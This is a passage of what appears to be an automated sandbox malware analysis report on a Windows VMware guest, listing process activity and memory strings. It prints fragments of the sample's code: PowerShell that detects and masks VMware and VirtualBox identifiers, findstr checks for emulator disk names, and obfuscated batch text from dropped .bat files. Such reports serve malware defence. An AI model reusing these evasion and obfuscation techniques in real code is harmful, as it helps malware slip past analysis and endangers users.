Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC64D894 FindFirstFileExW,9_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC67D894 FindFirstFileExW,9_2_00000225DC67D894
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC6ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC6ADA18
Source: C:\Windows\System32\winlogon.exe Code function: 9_2_00000225DC6AD894 FindFirstFileExW,9_2_00000225DC6AD894
Source: C:\Windows\System32\lsass.exe Code function: 10_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe Code function: 10_2_00000202C0AED894 FindFirstFileExW,10_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe Code function: 11_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe Code function: 11_2_000002A66130D894 FindFirstFileExW,11_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAED9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAED9DA18
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAED9D894 FindFirstFileExW,14_2_000002BAAED9D894
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAEE0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE0DA18
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAEE0D894 FindFirstFileExW,14_2_000002BAAEE0D894
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAEE6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE6DA18
Source: C:\Windows\System32\dwm.exe Code function: 14_2_000002BAAEE6D894 FindFirstFileExW,14_2_000002BAAEE6D894
Source: C:\Windows\System32\cmd.exe Code function: 15_2_000002512A6ED894 FindFirstFileExW,15_2_000002512A6ED894
Source: C:\Windows\System32\cmd.exe Code function: 15_2_000002512A6EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002512A6EDA18
Source: C:\Windows\System32\conhost.exe Code function: 16_2_000001BEB0A3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000001BEB0A3DA18
Source: C:\Windows\System32\conhost.exe Code function: 16_2_000001BEB0A3D894 FindFirstFileExW,16_2_000001BEB0A3D894
Source: C:\Windows\System32\svchost.exe Code function: 20_2_0000026A879CD894 FindFirstFileExW,20_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe Code function: 20_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe Code function: 21_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe Code function: 21_2_00000179537AD894 FindFirstFileExW,21_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe Code function: 21_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe Code function: 21_2_00000179537DD894 FindFirstFileExW,21_2_00000179537DD894
Source: C:\Windows\System32\svchost.exe Code function: 22_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe Code function: 22_2_000002295D56D894 FindFirstFileExW,22_2_000002295D56D894
Source: C:\Windows\System32\svchost.exe Code function: 23_2_0000025306E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306E6DA18
Source: C:\Windows\System32\svchost.exe Code function: 23_2_0000025306E6D894 FindFirstFileExW,23_2_0000025306E6D894
Source: C:\Windows\System32\svchost.exe Code function: 23_2_0000025306ECDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306ECDA18
Source: C:\Windows\System32\svchost.exe Code function: 23_2_0000025306ECD894 FindFirstFileExW,23_2_0000025306ECD894
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001845B3CD894 FindFirstFileExW,24_2_000001845B3CD894
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001845B3CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_000001845B3CDA18
Source: C:\Windows\System32\svchost.exe Code function: 25_2_000001ADECD4D894 FindFirstFileExW,25_2_000001ADECD4D894
Source: C:\Windows\System32\svchost.exe Code function: 25_2_000001ADECD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001ADECD4DA18
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D55907D894 FindFirstFileExW,26_2_000001D55907D894
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D55907DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D55907DA18
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D5590AD894 FindFirstFileExW,26_2_000001D5590AD894
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D5590ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590ADA18
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D5590DD894 FindFirstFileExW,26_2_000001D5590DD894
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000001D5590DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590DDA18
Source: C:\Windows\System32\svchost.exe Code function: 29_2_00000241A9EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_00000241A9EADA18
Source: C:\Windows\System32\svchost.exe Code function: 29_2_00000241A9EAD894 FindFirstFileExW,29_2_00000241A9EAD894
Source: C:\Windows\System32\svchost.exe Code function: 30_2_000001CD7319DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CD7319DA18
Source: C:\Windows\System32\svchost.exe Code function: 30_2_000001CD7319D894 FindFirstFileExW,30_2_000001CD7319D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.dr Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000018.00000002.2301414962.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.26.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000000B.00000002.2284316303.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.26.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: cmd.exe, 0000000F.00000003.2042779676.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045025170.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2028254912.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2042617080.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2044624942.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2027664001.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2041830461.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045247941.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045892043.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2049088156.000002512A761000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2027421836.000002512A765000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" ]
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 0000001A.00000000.2100413094.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2300791872.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000002D.00000000.2187406854.000002644A640000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 0000001A.00000000.2102357647.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.26.dr Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.26.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 0000001A.00000000.2100879086.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: svchost.exe, 0000001A.00000003.2167646150.000001D559CEF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -47vmci
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000E.00000002.2338111026.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.26.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkcPpvurAXWtxKkzLlCbuHLZTpCNpXwtSfMedjRACaYVY%o%pwXGiNPxudycWaTGbCBCAsXfvBtcyuIQbTZfQJOJEuLIFanQHVYvuvzXyRkHtMZZ%%IbdaNQsNRYfHpzuoCvCvnvFtcHYyhpR%c%LoXZjQTfGHCwtqisQsRrwEhnvJYfRUGC%%KVbCvfMBxPFSjaMyG%a%PxzYghJDASOnMbapJuhPunePZPBumJlGllQeHMOUSSFUNj%%DSTqsrQoBtJYr%l%oqQGhcAkVHXFnWBIkcQLYCssTpvXoLYNwoEBOnFhDsX%%tMeTMTiHiGHMXxNSHCVjJji% %saTWwJiFEgZglBlvDqFQHSDqANzawNDjDfBMZlkzxbhRyGHfrAGsEsqAwCwIjii%%DQCfayvrfgtGKMSTguIWhkFlPaqwPBpoTqnHdBfSeomyYKPJJCCPAmJ%e%krqZiYCDQeMuzkPEoPRTXgmelGMnZA%%HGUwMlgKgMIHUXukzMYAKuQveelNBloEqqfNEOdsifLgozshRwnA%n%ZdmQzsIasi%%xerDRGFLJGsFJJgELeWfXODqmTXfvusPWQIkiOpkRCRuHxCgtOXVvdWJAbr%a%JAponCITbVwWOMnuWjIOqQMGxwtTTYKgxrBrmCgePJfxrahJPBNqsCHTOJRRjOZ%%kpyxkWhtcEZH%b%oowpJesltOVJIDDLpVaKdmcCJzSttoNCaizuvCzKHQRBDOCt%%INIZXGbmTFkmYSfasJzdjqNwpdnvAYVWyPKBfDdCx%l%BWoyIXMAledqusZmJT%%GLVKoNihDVOGXFbORiRupJaNQTiusB%e%UjiRvGlZKAQiFwygKtDieSzeWLhUvEOObdUwONFiFigUyAvrrNybPtObJ%%UKyqEgMbgBCcrW%d%uCWLEFwqQDIgMZIpSMKSVJoDaixuTOpvBnuQRqezytINWZZbxmJp%%dSLnsLwhbxbnmFzFSxBHkuBaBHaivWGfaOxvJCyFIrwWH%e%JtAwFPhHwJqKMLKnMfRVnyidWqYWZSXFtbXHI%%qQXsrNeYPMVuFrfLmllwApQlHDMLqLOcENOaYUgvZXAlaEnGzHPMvmybZMLOasH%l%YSPRCeNrfQwDOE%%cpgmJVcHspNaljsuHpvn%a%PweuUxHFQVmuCIyUgY%%WlxCOeChMwPntrbnTcR%y%yvcCuBFIBTzAqnqXrTpqspUjaHTdAuESpjKBiVhnyTGTWoWgaeWaM%%wiBTBMHCihpHlhCPOwLbSyJbnMKNcwyEfPMBa%e%tvFVLyDodPDlpzoKHYzzGPbUAL%%LBvubPzcqwXNkxYJVkQhYpviOcAJEtLuZPRMHvBwQwXoJko%d%HggKJEKvgnFZ%%PyXKCOuFlbzIuqBsgyDNybymb%e%vfwGtPChaYaDgwUwveHbpnidaPcmQOZKJStojFIKfnqDrCrh%%bFuFZvhXsFDNqqmZpUodFmQwWWbXFLxyUtPiFfKxlrRZeXPXeDcIcdnPP%x%IctjrGifSXBdtjjRRnuQsZgeTbJPvQ
gZtHxHdcZkRYeSwbkSylmZuYFIWoqqWt%%bQBJMMBNPnjYtVoISRRqkEgFubOLOLJoyocbUrxfXxwLkamN%p%GyzfczxKWpKYQYdEVAfSmNAtLtNiuuuPadinkjvOFrYbN%%gyshozgVvSXftJMopB%a%UXMQQuMfqmVPzGEmoPnfUIfIpqeQLcqcwhSkuIBNCuQIzdyzPxxybwZlSdA%%qVtoVTsrNuRGoACASwjmREbnESaahHrqhbxGa%n%MGKgMvGRkBTztvUoILUgKdSskgcAymdWzqJCBLS%%HMHyhHoWwTsLLURJOsVFsfsYyXZcMsMWSoyXwtkDSge%s%TrkEyaOiQnnBuIajHlkegwTxwUmuhsNmbNehNuELEE%%FbWCNtaVGWayxxMi%i%NtayzaAGETwmHyzCqovzrzbgwhqapHJamaYkDHgav%%jzEIYxAWhjqJlosTbsJzrXkwaHApYIhvdvqBCOiTAtAzJCOJSKGOqWEmphHr%o%lXzbVFPXQqnjQZYwLNySQwobtehRemugQVpvbxNWYMbttEzWFPEujyhOJxIRyY%%EWgsVKDvnZBUevUIPEklpIaXrOALDPWyaSxxnlEmctqvIEdtOOSmnMEVVi%n%gjRSyccTlXx%
Source: lsass.exe, 0000000A.00000000.1990332991.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2293458545.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1995151583.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2282909657.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2277019889.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2067918810.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.2070050099.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2275201092.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.2086864501.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2302804582.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2100413094.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: cmd.exe, 0000000F.00000003.2087717919.000002512A76D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IrJixRQdwUjyuCVcSzIEUPYkcecxbDY%O%eDjNKJQaGgpBwHubMFLVJXAlTtzgsPtbSWeUkPltbycxEoCCIdq%e%RpIohcYTrkKHRNnJADzQWurTkVdGFQWyozCLjHXRmVUjrRlKqEb%i%ZintwXOdmZroAnmsrlBzTFHDbAiCtKspaOXpbgfOvDLSUHtVfyT%t%zOfitBKrWPmKCHboLqXrlfNdpUPIugnxVQSBUGENqOiYiTikTsH%v%FhgItabTyMbXPCOOLOAtfMjawXPUvLEPbzHpPhzASMfbpQswtex%v%wsZCTYfmwlgxMimWqUzZDpaAsGiLFEsAqoiwbWOrJVcoLptSdUc%Y%CUfTgsyjmPuGRTFgyZPUufiqHmMOdnpILCQGlubeDMBBpplvgiU%U%TnZHwMPmUFJgZAMVpcZVdYKrHEGasbqIUswuLUtUwigyTGBbDuV%R%sgnRUCIaSfOTTpamHdrjuIfyVSmxbcExYfYCGACRdTBOHonjStU%=t%lkBJbOWbqkZPAqVNqyFgAAfAhqQGEcFHiGmNDoAREAATUMnrtzStONxKeaCKYpxnEsHUehjbYNCaZm%e%GudznfjlSvjBIDMPTodmoBftmlpRvakwLSuhHycsetzlKCzGpjTnWMXepJmbPsQSkMQQiEhvmLiVcT%m%IKMJBmhXzYUpRYlaCLCHbYMIxLbxblDcbwaCpgREKmmRVTMjjlixtvSKXdlQkJWovSnvXJKwUYWOLU%.%NEYSoPdgIGEqEmUatbqYwdFrmAALCvydYdqGRsvhlojHRGfyBTEVyNyJZHFNorEniAsBWojaGjNiTX%I%zFvckJQDElEGGkMHSTKVzqoDBnKDppaqPbhasmhUxFWhWqHYnYqTxYyjqRBWYmnpkoQFdMoFMPyUuh%O%HlGLpqYhSRDXJBLkVkrGWIzcVBKLgIAEPjkpqnWXqdvYbfcNUCTnCNlYLEQOFnakrYiAqvUIntqSnB%.%aPzXRDOmbbYlEMwirdckGdWCwyIkZjxsLkDaoIwwwfXhBeRhmecmPcUXSWAsVDnSEFAuivTIHFOBfP%F%arHAYUgkCIpGhsidBTSfDWEwYQltFjosRdWjLuEsLtcSeCnBADeVJameNkBiJMEstXOevYsgoztjTL%i%swCJTbftIRRSvASwIYOJyhNjgBlXGkHckbSfFaTDnaoXmDCRoSQuujnkItDrQhMyjPHuINRIflwyTQ%l%WCYtJOtmHbOHwlxBNfnPNxWijAaiojMOrSwatwyYfWhFGaqFlEyqldcyGQkiNlYyoZpEOwiqHoJQqq%e%BikvWKKwDnPYtCmpkUYIqHLLQOvhIWtmipobXsonNSvbPQcFesdPRHZUxzEipCOGUCPeokrSFKVylJ%]%WaLPdqSEuAqtEyNgYkeOhmbYrTalkhMBJNDDwzzxOpioNVGTeyMKuwBJZMyjpHtnOPJQVkJzLGaRdM%:%kwmggLubgnlTEJaphhWVzYlQYUOnZOvKFmBcWjAISNIwEbFZyvyTVimmlwimWhbsRBnriYsYGocMqO%:%mWoOOEpCOwapQAanLKLqFcNnRzdAmHgzVwjmXhtxdoNRqShRYtCrbZjkjaXpAPqhqAtuqOqDrnnqpW%"
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000F.00000003.2042220661.000002512A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2041976604.000002512A740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" ##?
Source: x.bat, $rbx-CO2.bat.12.drBinary or memory string: %lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkcPpvurAXWtxKkzLlCbuHLZTpCNpXwtSfMedjRACaYVY%o%pwXGiNPxudycWaTGbCBCAsXfvBtcyuIQbTZfQJOJEuLIFanQHVYvuvzXyRkHtMZZ%%IbdaNQsNRYfHpzuoCvCvnvFtcHYyhpR%c%LoXZjQTfGHCwtqisQsRrwEhnvJYfRUGC%%KVbCvfMBxPFSjaMyG%a%PxzYghJDASOnMbapJuhPunePZPBumJlGllQeHMOUSSFUNj%%DSTqsrQoBtJYr%l%oqQGhcAkVHXFnWBIkcQLYCssTpvXoLYNwoEBOnFhDsX%%tMeTMTiHiGHMXxNSHCVjJji% %saTWwJiFEgZglBlvDqFQHSDqANzawNDjDfBMZlkzxbhRyGHfrAGsEsqAwCwIjii%%DQCfayvrfgtGKMSTguIWhkFlPaqwPBpoTqnHdBfSeomyYKPJJCCPAmJ%e%krqZiYCDQeMuzkPEoPRTXgmelGMnZA%%HGUwMlgKgMIHUXukzMYAKuQveelNBloEqqfNEOdsifLgozshRwnA%n%ZdmQzsIasi%%xerDRGFLJGsFJJgELeWfXODqmTXfvusPWQIkiOpkRCRuHxCgtOXVvdWJAbr%a%JAponCITbVwWOMnuWjIOqQMGxwtTTYKgxrBrmCgePJfxrahJPBNqsCHTOJRRjOZ%%kpyxkWhtcEZH%b%oowpJesltOVJIDDLpVaKdmcCJzSttoNCaizuvCzKHQRBDOCt%%INIZXGbmTFkmYSfasJzdjqNwpdnvAYVWyPKBfDdCx%l%BWoyIXMAledqusZmJT%%GLVKoNihDVOGXFbORiRupJaNQTiusB%e%UjiRvGlZKAQiFwygKtDieSzeWLhUvEOObdUwONFiFigUyAvrrNybPtObJ%%UKyqEgMbgBCcrW%d%uCWLEFwqQDIgMZIpSMKSVJoDaixuTOpvBnuQRqezytINWZZbxmJp%%dSLnsLwhbxbnmFzFSxBHkuBaBHaivWGfaOxvJCyFIrwWH%e%JtAwFPhHwJqKMLKnMfRVnyidWqYWZSXFtbXHI%%qQXsrNeYPMVuFrfLmllwApQlHDMLqLOcENOaYUgvZXAlaEnGzHPMvmybZMLOasH%l%YSPRCeNrfQwDOE%%cpgmJVcHspNaljsuHpvn%a%PweuUxHFQVmuCIyUgY%%WlxCOeChMwPntrbnTcR%y%yvcCuBFIBTzAqnqXrTpqspUjaHTdAuESpjKBiVhnyTGTWoWgaeWaM%%wiBTBMHCihpHlhCPOwLbSyJbnMKNcwyEfPMBa%e%tvFVLyDodPDlpzoKHYzzGPbUAL%%LBvubPzcqwXNkxYJVkQhYpviOcAJEtLuZPRMHvBwQwXoJko%d%HggKJEKvgnFZ%%PyXKCOuF